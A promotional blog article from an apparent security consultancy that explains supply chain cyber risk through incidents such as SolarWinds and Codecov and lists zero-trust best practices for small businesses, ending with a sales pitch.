Why Is Supply Chain Security Important?

The SolarWinds cyberattack of late 2020 could mark the moment businesses finally confront the scale of challenge they face in securing their supply chains.

SolarWinds reads like a hacker’s fantasy: compromise a single obscure company and in doing so gain secret access to thousands of its highly-prized customers across the world. Better still, none of the victims would suspect a thing because, after all, SolarWinds was a trusted supplier nobody worried about. If security company FireEye hadn’t joined the dots in December this extraordinary incident might have gone unnoticed for years rather than months.

SolarWinds isn’t the only recent example of this phenomenon. In April, a vulnerability in developer auditing tools produced by a company called Codecov allowed attackers to target hundreds of its customers. Likewise, the targeting of Accellion’s File Transfer Appliance (FTA) product using multiple zero-day vulnerabilities which left several hundred customers still using it badly exposed. What made the latter particularly telling was that the FTA was a 20 year-old old product, a good example of how even legacy supply chains organisations think they’ve moved on from can come back to bite them years later.

None of this was exactly new. In 2011 the encryption IP behind RSA’s highly-regarded SecureID hardware authentication tokens was compromised by hackers, which led to the company having to replace 40 million expensive tokens at huge expense after attacks against customers were detected. Everyone thought RSA was an unlucky one-off and everyone, we now know, was wrong.

What Is a Supply Chain?

Supply chains vary by industry sector but can include not only technology providers, but potentially any third-party with which an organisation has a trusted relationship.  Every organisation, including SMEs, will have a list of these, usually outsourcing or commercial partners of one sort or another. The danger they pose is proportional to the amount of access they have to a company’s systems, its data, and in some cases its premises.

From a cybersecurity point of view, the problem is that no matter how well an organisation secures its own infrastructure, it can’t be sure that its partners are doing as good a job. The security state of that partner is often taken on trust. Organisations can’t just cut themselves off from outsiders in an era when technology, data sharing and outsourcing have become fundamental to doing business.

Zero Trust

Can such a problem with supply chains ever be solved? Around 15 years ago a group of inspired British CISOs from the Jericho Forum came up with an idea which eventually coalesced into what is now called ‘zero trust security’. You’ll find various overlapping definitions of what this means but it can be reduced to a simple principle: assume the worst and trust nobody. In the last decade, the rapid growth in cybercrime has turned it from a collection of discussion documents read by a small group of thinkers to the cybersecurity equivalent of the ten commandments.

Supply Chain Security Best Practices

Zero trust principles and best practices can be applied to SME supply chain security in different ways.

1. Audit your supply chain, breaking down the list of suppliers into categories depending on the level or risk they pose and their access to your company’s network and data. This will include tech organisations (software, cloud, managed service providers, payment processors), professional services (legal, building security, etc), and partners (component makers, data partners).
2. Expand the compliance required from each partner, for example by asking for penetration test reports, notification of data breaches, GDPR violations. Cloud providers should be able to provide System and Organisation Controls (SOC) reports to meet SOC 1, 2, or 3. You have a patching regime but does your trusted supplier? If they don’t and your data is in their hands it’s as if your company is as vulnerable as they are.
3. Lock down supplier privileges offered to suppliers and apply multi-factor authentication to any access they are given. Remember, stolen credentials are a major risk factor, including when they are stolen from third parties. Do the same for interfaces such as VPNs (which are not infallible by the way) and Remote Desktop Protocol (RDP), both of which are popular targets for ransomware attackers.
4. Beware the back door of over-trusting the software chain of trust. As a recent report on software supply chain security from the US Cybersecurity and Infrastructure and Security agency (CISA) notes, this covers the hijacking of updates, undermining code signing, and compromises of open source libraries. SMEs might not realise that these dependencies exist or are part of the supply chain, but everyone is now exposed to some degree.
5. Take seriously the need for regular penetration tests. These are an excellent way to get insight on the vulnerabilities that might be lurking in hidden supply chains or suppliers nobody has thought to assess for their security.
6. Assume attackers are in your network and go looking for them. Remember, the dwell time before ransomware malware executes is a week or longer, which means that by the time the ransom note appears on a PC it’s probably too late. The endpoint and other security products you use in conjunction with should be configured on this basis. If using a managed security service provider (MSSP), they need permission not only to detect an attack but to intervene if something is unfolding.

Conclusion

Cyber Security risks are becoming among the most significant for today’s businesses and it is clear that a robust approach to security will be required for most, if not all, organisations. Yet not all business risks are internal and, as this article shows, many risks result from supplier relationships.

Having agreements in place with your suppliers to address these security risks is critical, as will be the need to ensure they are adhering to the terms of any agreement.

If you would like to explore options for improving your business security contact us to speak with one of our advisers. We offer a range of services from e-learning for your staff to cyber essentials and ISO 27001 certification. Complete this form or call us on 0800 404 7007 – we’re here to help!